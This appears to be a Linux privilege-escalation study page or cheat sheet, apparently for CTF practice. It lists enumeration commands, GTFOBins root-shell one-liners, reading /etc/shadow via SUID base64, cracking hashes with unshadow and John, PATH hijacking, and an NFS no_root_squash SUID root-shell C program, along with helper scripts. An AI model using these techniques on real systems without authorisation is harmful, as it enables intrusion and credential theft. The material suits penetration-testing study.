Enumeration
Once system information (kernel version, distribution, versions of installed software) has been gathered, check Exploit-DB for public exploits that match - Exploit-DB
Useful Commands
Some useful commands once access to a machine has been gained:

- `hostname` - can provide some information about the target's role within the organisation
- `uname -a` - prints the kernel name, version and architecture; useful for searching for kernel vulnerabilities
- `cat /proc/version` - kernel version plus the compiler it was built with (e.g. GCC), a hint about which toolchain may be present on the box
- `cat /etc/issue` - distribution name and version banner
- `ps` - shows running processes. Useful flags include `aux` (all users' processes with their owner), `axjf` (process tree) and `-A` (all processes)
- `env` - shows environment variables; look for credentials, unusual paths and preload settings
- `sudo -l` - shows what the current user may run via sudo, and with which options (e.g. `NOPASSWD`)
- `ls -la` - list all files and directories, including hidden ones
- `id` - shows the user ID, group ID and group memberships of the current user (groups such as `docker`, `lxd`, `disk` or `adm` are escalation paths in themselves)
- `cat /etc/passwd` - list all users on the target; better examples below:

```
cat /etc/passwd | cut -d ":" -f 1
```

```
cat /etc/passwd | grep home
```

- `history` - command history, may contain passwords or usernames (also read `~/.bash_history` and other shells' history files directly)
- `ifconfig` (or `ip a`) - network interface information
- `ip route` - network routing information
- `netstat -a` - all listening ports and established connections
- `netstat -at` or `netstat -au` - list TCP or UDP connections respectively
- `netstat -l` - lists all listening ports
- `netstat -s` - shows statistics on network usage
- `netstat -l -p` - list all listening ports and the processes using them (other users' process names are only shown to root)
- `netstat -i` - show network interface statistics
- `netstat -ano` - show all connections (`-a`), do not resolve names (`-n`), display timers (`-o`); on systems without `netstat`, `ss -tulpn` gives the same picture
- `find . -name flag1.txt` - find files named `flag1.txt` under the current directory
- `find /home -name flag1.txt` - find files named `flag1.txt` under `/home`
- `find / -type d -name config` - find directories named `config` anywhere on the filesystem
- `find / -type f -perm 0777` - find all files with permissions of exactly 777
- `find / -type f -perm /a=x` - find all files with any execute bit set (`-perm a=x` without the slash matches only files whose mode is exactly `--x--x--x`)
- `find /home -user frank` - find all files owned by user "frank" under `/home`
- `find / -mtime -10` - find files modified in the last 10 days (`-mtime 10` without the minus matches only files modified exactly 10 days ago)
- `find / -atime -10` - find files accessed in the last 10 days
- `find / -cmin -60` - find files whose inode (permissions, owner, etc.) changed in the last 60 minutes
- `find / -amin -60` - find files accessed in the last 60 minutes
- `find / -size 50M` - find files that are exactly 50MB in size; use `+` or `-` to specify files larger or smaller than the given size
- `find / -size +100M -type f 2>/dev/null` - find files larger than 100MB; `2>/dev/null` discards the permission-denied errors
- `find / -writable -type d 2>/dev/null` - find directories writable by the current user
- `find / -perm -222 -type d 2>/dev/null` - find directories writable by owner, group and others
- `find / -perm -o=w -type d 2>/dev/null` - find world-writable directories
- `find / -perm -o=x -type d 2>/dev/null` - find world-executable (searchable) directories
- `find / -name "perl*"`, `find / -name "python*"`, `find / -name "gcc*"` - find dev tools and supported languages (quote the pattern so the shell does not expand it first)
- `find / -perm -u=s -type f 2>/dev/null` - find files with the SUID bit set; these run with the privileges of the file's owner rather than those of the user executing them
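The `/etc/passwd` commands above answer one question each. As an added example (not part of the original page), the script below packages the same enumeration into small functions over a passwd file passed as an argument, so the checks can also be run against a copy pulled off a target. The sample file at the bottom is constructed, and the UID cut-off of 1000 for human accounts is a Debian/RHEL convention assumed here.

```shell
#!/bin/bash
# Added example (not from the original page): triage a passwd file the way the
# enumeration commands above do, but with each finding made explicit:
#   - every account with UID 0 (a second "root" is a classic backdoor)
#   - accounts with a real login shell (the ones worth su-ing or brute-forcing)
#   - human accounts by UID range (1000..65533 is an assumed Debian/RHEL convention)
# The passwd file is passed as $1 so a copy from a target can be inspected.

uid0_accounts() {      # names of every account whose UID is 0
  awk -F: '$3 == 0 { print $1 }' "$1"
}

login_accounts() {     # user:home:shell for accounts that can actually log in
  awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 ":" $6 ":" $7 }' "$1"
}

human_accounts() {     # accounts in the conventional human UID range
  awk -F: '$3 >= 1000 && $3 < 65534 { print $1 }' "$1"
}

# --- demo on a constructed passwd file ---
demo_passwd=$(mktemp)
cat > "$demo_passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
frank:x:1000:1000:Frank:/home/frank:/bin/bash
svc-backup:x:1001:1001::/home/svc-backup:/usr/sbin/nologin
toor:x:0:0:second root:/root:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
EOF

echo "== UID 0 accounts =="; uid0_accounts "$demo_passwd"
echo "== accounts with a login shell =="; login_accounts "$demo_passwd"
echo "== human accounts =="; human_accounts "$demo_passwd"
rm -f "$demo_passwd"
```

Run it against the live file with `uid0_accounts /etc/passwd`; the `toor` line in the sample shows why the UID check matters more than the username.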
Links to various enumeration tools that are well worth learning to use:
Get The Fuck Out Bins
GTFOBins - a curated list of legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, etc. Example of a one-liner that drops into a root shell when `find` may be run via `sudo`:

```
sudo find . -exec /bin/sh \; -quit
```

If `find` is SUID rather than sudo-able, the same idea applies but the shell must be asked to keep the effective UID (`find . -exec /bin/sh -p \; -quit`), otherwise it silently drops back to the calling user.
Cat Alternative
If `cat` is refused but `base64` turns out to be SUID (see the SUID check below), it reads the file with the owner's privileges; decoding the output gives the plaintext:

```
base64 /etc/shadow | base64 -d
```
Check for SUID/SGID
Use the command below to see which files have the SUID bit set (`-04000`); use `-02000` for SGID, or `-perm /6000` to list files with either bit:

```
find / -type f -perm -04000 -ls 2>/dev/null
```

Good practice is to compare the executables from the generated list with GTFOBins. Check for things like `base64` and `nano` when `cat` returns permission denied.
Unshadow
Use the `unshadow` tool with John the Ripper to crack passwords from the `/etc/shadow` file and the `/etc/passwd` file (copies of both are needed; `shadow` is only readable as root).

```
unshadow passwd.txt shadow.txt > passwords.txt
```

```
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
```
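To show what `unshadow` actually produces (the passwd line with its `x` replaced by the hash from the matching shadow entry), here is an added example, not from the original page and not the real `unshadow` source, that re-implements the merge in awk and labels the hash type from its crypt(3) prefix so the matching John format or Hashcat mode can be chosen. Unlike the real tool it drops locked or empty entries (`!`, `*`), since John would skip them anyway. The sample passwd and shadow lines are constructed and the hashes are not real.

```shell
#!/bin/bash
# Added example (not from the original page): a minimal re-implementation of
# what `unshadow` does. For each passwd line, the "x" placeholder in field 2
# is replaced by the hash from the shadow entry with the same username.
# Entries with no crackable hash (empty, "!" or "*") are dropped here, which
# the real unshadow does not do. Sample data below is constructed.

# usage: merge_shadow passwd_file shadow_file
merge_shadow() {
  awk -F: -v OFS=: '
    NR == FNR { hash[$1] = $2; next }                         # 1st file: shadow
    ($1 in hash) && hash[$1] != "" && hash[$1] !~ /^[!*]/ {   # 2nd file: passwd
      $2 = hash[$1]; print
    }
  ' "$2" "$1"
}

# Identify the hash type from the crypt(3) prefix ($6$ = sha512crypt, ...).
hash_type() {
  case "$1" in
    '$1$'*)                   echo md5crypt ;;
    '$5$'*)                   echo sha256crypt ;;
    '$6$'*)                   echo sha512crypt ;;
    '$2a$'*|'$2b$'*|'$2y$'*)  echo bcrypt ;;
    '$y$'*)                   echo yescrypt ;;
    *)                        echo unknown ;;
  esac
}

# --- demo on constructed input (hashes are placeholders, not real digests) ---
pw=$(mktemp); sd=$(mktemp)
cat > "$pw" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
frank:x:1000:1000:Frank:/home/frank:/bin/bash
EOF
cat > "$sd" <<'EOF'
root:$6$saltsalt$FAKEHASHFORDEMO:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
frank:$y$j9T$saltsalt$FAKEHASHFORDEMO:19000:0:99999:7:::
EOF
merge_shadow "$pw" "$sd" | while IFS=: read -r user hash rest; do
  echo "$user -> $(hash_type "$hash")"
done
rm -f "$pw" "$sd"
```

The type label matters for the tool choice: `$y$` (yescrypt, the default on recent Debian and Fedora) is supported by John but had no Hashcat mode for a long time, so check the hash prefix before deciding which cracker to start.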
I have recently compared the performance of John the Ripper with Hashcat on my MBP. I cannot believe how damned fast Hashcat is compared to John. Whenever I can, in future I shall always be using Hashcat as a first choice. It blasted John out of the water. In one test it cracked a BCrypt hash in seconds compared to John taking what felt like a lifetime. If you’re a fan of John and have not really looked at Hashcat, I recommend you do.
Capabilities
File capabilities give a binary a slice of root's power (for example `cap_setuid`) without the SUID bit, are easy to overlook, and can be extremely useful for getting root privileges:

```
getcap -r / 2>/dev/null
```

The above command lists every executable carrying file capabilities. Check each one against GTFOBins. Example for a copy of `vim` that has `cap_setuid` (the binary must be built with Python support; use `:py3` where `:py` is not available):

```
./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
```
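Pulling together the SUID/SGID check and the `getcap` check above: the script below is an added example, not from the original page or from GTFOBins, that filters `find -perm -4000` output against a hand-picked excerpt of GTFOBins SUID entries and parses both `getcap` output styles (older libcap prints `path = cap+ep`, newer prints `path cap=ep`) for capabilities that commonly lead to root. The `GTFOBINS_SUID` and `INTERESTING_CAPS` lists are assumptions chosen for the demo, not the full lists, and the demo input is constructed.

```shell
#!/bin/bash
# Added example (not from the original page): offline triage of SUID binaries
# and file capabilities. Assumptions: GTFOBINS_SUID is a short hand-picked
# excerpt of names with a GTFOBins SUID entry (the real list is longer), and
# INTERESTING_CAPS are the capabilities that most often give a direct root path.

GTFOBINS_SUID="awk base64 bash cp env find gawk less more mv nano perl php python python2 python3 vim vim.basic"
INTERESTING_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_chown cap_fowner"

# Read absolute paths (one per line) on stdin; print those whose basename
# appears in the GTFOBins excerpt. Candidates for a `./bin -p`-style shell.
suid_gtfobins() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    name=$(basename "$path")
    for known in $GTFOBINS_SUID; do
      if [ "$name" = "$known" ]; then
        printf '%s\n' "$path"
        break
      fi
    done
  done
}

# Parse `getcap -r` output on stdin. Both output styles are handled:
#   old libcap:  /usr/bin/python3 = cap_setuid+ep
#   new libcap:  /usr/bin/python3 cap_setuid=ep
# Print "path caps" for binaries carrying at least one interesting capability.
caps_of_interest() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    path=${line%% *}                  # first word is always the path
    caps=${line#"$path"}              # remainder: " = cap_x+ep" or " cap_x=ep"
    caps=${caps#" = "}; caps=${caps#" "}
    for want in $INTERESTING_CAPS; do
      case "$caps" in
        *"$want"*) printf '%s %s\n' "$path" "$caps"; break ;;
      esac
    done
  done
}

# Live use on a target (commented out so the demo below stays offline):
#   find / -type f -perm -4000 2>/dev/null | suid_gtfobins
#   getcap -r / 2>/dev/null | caps_of_interest

# --- demo on constructed input ---
echo "== SUID binaries worth checking on GTFOBins =="
printf '%s\n' /usr/bin/passwd /usr/bin/find /usr/bin/sudo /usr/bin/vim.basic /usr/bin/base64 | suid_gtfobins
echo "== capabilities worth checking =="
printf '%s\n' '/usr/bin/ping = cap_net_raw+ep' '/usr/bin/python3 = cap_setuid+ep' '/usr/bin/vim cap_dac_override=ep' | caps_of_interest
```

`passwd` and `sudo` are SUID on every box and are filtered out as expected noise; `cap_net_raw` on `ping` is likewise normal, whereas `cap_setuid` on an interpreter is a one-liner away from root.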
Find Writable Folders
When finding writable folders, the output can be very long. Use the following to reduce it to the top-level directories that contain something writable (`cut -d "/" -f 2` keeps only the first path component):

```
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
```

Followed by something like this, to drill into one branch two components deep:

```
find / -writable 2>/dev/null | grep usr | cut -d "/" -f 2,3 | sort -u
```

or, dropping the always-noisy `/proc` entries:

```
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
```
Path Env Variable
Add a writable folder to the front of `$PATH`, so that a binary placed there is found before the real one when a privileged script or SUID program calls a command by its bare name:

```
export PATH=/home/<user>:$PATH
```

Appending instead (`export PATH=$PATH:/home/<user>`) only helps when the command being called does not exist anywhere else in `$PATH`.
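To make the ordering point concrete, the following added example (not from the original page) plants a fake `ls` in a temporary directory and resolves the bare name `ls` under an appended and a prepended `PATH`. Nothing is written outside the temp directory and the fake binary only prints a marker; `/bin/sh` is assumed to exist, as it does on any Linux target.

```shell
#!/bin/bash
# Added example (not from the original page): why the position of a writable
# directory in $PATH matters. A script or SUID program that calls a command
# by bare name ("ls", "service", ...) resolves it through $PATH, so a planted
# file with that name runs instead when its directory is searched first.

# Path that a fresh /bin/sh would execute for a bare command under PATH=$2.
resolve_cmd() {          # usage: resolve_cmd <command> <path_value>
  PATH="$2" /bin/sh -c 'command -v "$1"' _ "$1"
}

# Plant a fake binary named $2 in directory $1 that only announces itself.
plant_fake() {           # usage: plant_fake <dir> <name>
  cat > "$1/$2" <<'EOF'
#!/bin/sh
echo "HIJACKED: $0 ran as uid $(id -u)"
EOF
  chmod 755 "$1/$2"
}

# Simulate the victim: a script that calls "ls" without an absolute path.
victim_runs_ls() {       # usage: victim_runs_ls <path_value>
  PATH="$1" /bin/sh -c 'ls' 2>&1 | head -n 1
}

# --- demo in a throw-away directory ---
work=$(mktemp -d)
plant_fake "$work" ls

# Appending does NOT hijack ls: the real one is found earlier in PATH.
echo "appended:  $(resolve_cmd ls "$PATH:$work")"
# Prepending does: the writable directory is searched first.
echo "prepended: $(resolve_cmd ls "$work:$PATH")"
victim_runs_ls "$work:$PATH"

rm -rf "$work"
```

In a real escalation the fake binary would spawn a shell or copy `/bin/bash` with the SUID bit, and the victim would be a root cron job or a SUID program whose `strings` output shows a bare command name.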
Enumerate mountable network shares
```
showmount -e <target_ip>
```

- Choose an export that is configured with `no_root_squash` (visible in `/etc/exports` on the target; it means root on the client keeps UID 0 on the share, so files created there are root-owned) and mount it from the attacking machine as root onto a temp folder:

```
mkdir -p /tmp/temp
mount -o rw <target_ip>:/tmp /tmp/temp
```
Create and Compile
Create and compile the executable below on the mounted share (as root on the attacking machine, with `gcc`), then set the SUID bit on it with `chmod u+s`. Because of `no_root_squash` the file stays owned by root, so running it on the target as the low-privilege user gives a root shell (unless the target mounts the share with `nosuid`).

```c
#include <stdlib.h>
#include <unistd.h>

/* Runs with euid 0 via the SUID bit; setgid/setuid(0) make the real IDs 0 too,
   so bash does not drop privileges when it starts. */
int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
```
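The NFS route above, combined as an added example that is not part of the original page: the only code that executes here is a parser that picks the `no_root_squash` exports out of an `/etc/exports` listing (constructed sample); the mount, compile and `chmod u+s` steps are listed as comments because they need a live target and root on the attacking box. The mount point `/tmp/nfs` and the file name `shell.c` for the C program above are assumptions.

```shell
#!/bin/bash
# Added example (not from the original page): the no_root_squash route end to
# end. Only the exports parser runs here; the privileged steps are comments.
# Assumptions: attacker mounts at /tmp/nfs, the target exports /tmp, and the
# SUID payload is the C program from the section above saved as shell.c.

# Read /etc/exports on stdin; print "path client options" for every client
# spec whose option list contains no_root_squash.
no_root_squash_exports() {
  sed -e 's/#.*//' -e '/^[[:space:]]*$/d' |      # drop comments and blank lines
  awk '{
    path = $1
    for (i = 2; i <= NF; i++) {                  # one client spec per field
      spec = $i
      if (match(spec, /\(.*\)$/)) {
        client = substr(spec, 1, RSTART - 1)
        opts   = substr(spec, RSTART + 1, RLENGTH - 2)
      } else { client = spec; opts = "" }
      if (client == "") client = "*"
      if (opts ~ /(^|,)no_root_squash(,|$)/) print path, client, opts
    }
  }'
}

# Steps on the attacking machine, as root, once a candidate share is chosen:
#   showmount -e <target_ip>
#   mkdir -p /tmp/nfs && mount -o rw <target_ip>:/tmp /tmp/nfs
#   gcc -o /tmp/nfs/shell shell.c       # shell.c is the C program above
#   chmod u+s /tmp/nfs/shell            # stays root-owned thanks to no_root_squash
# Then on the target, as the low-privilege user:
#   /tmp/shell                          # root shell unless the mount is nosuid

# --- demo on a constructed exports file ---
printf '%s\n' \
  '# /etc/exports (constructed sample)' \
  '/srv/public   *(ro,sync,root_squash)' \
  '/tmp          *(rw,sync,insecure,no_root_squash,no_subtree_check)' \
  '/home/backups 10.0.0.0/24(rw,no_root_squash) 10.0.1.5(ro)' \
  | no_root_squash_exports
```

Note that `root_squash` (the default) is not matched, only the explicit `no_root_squash`; the parser also reports which client range the option applies to, since a share may squash root for one network and not another.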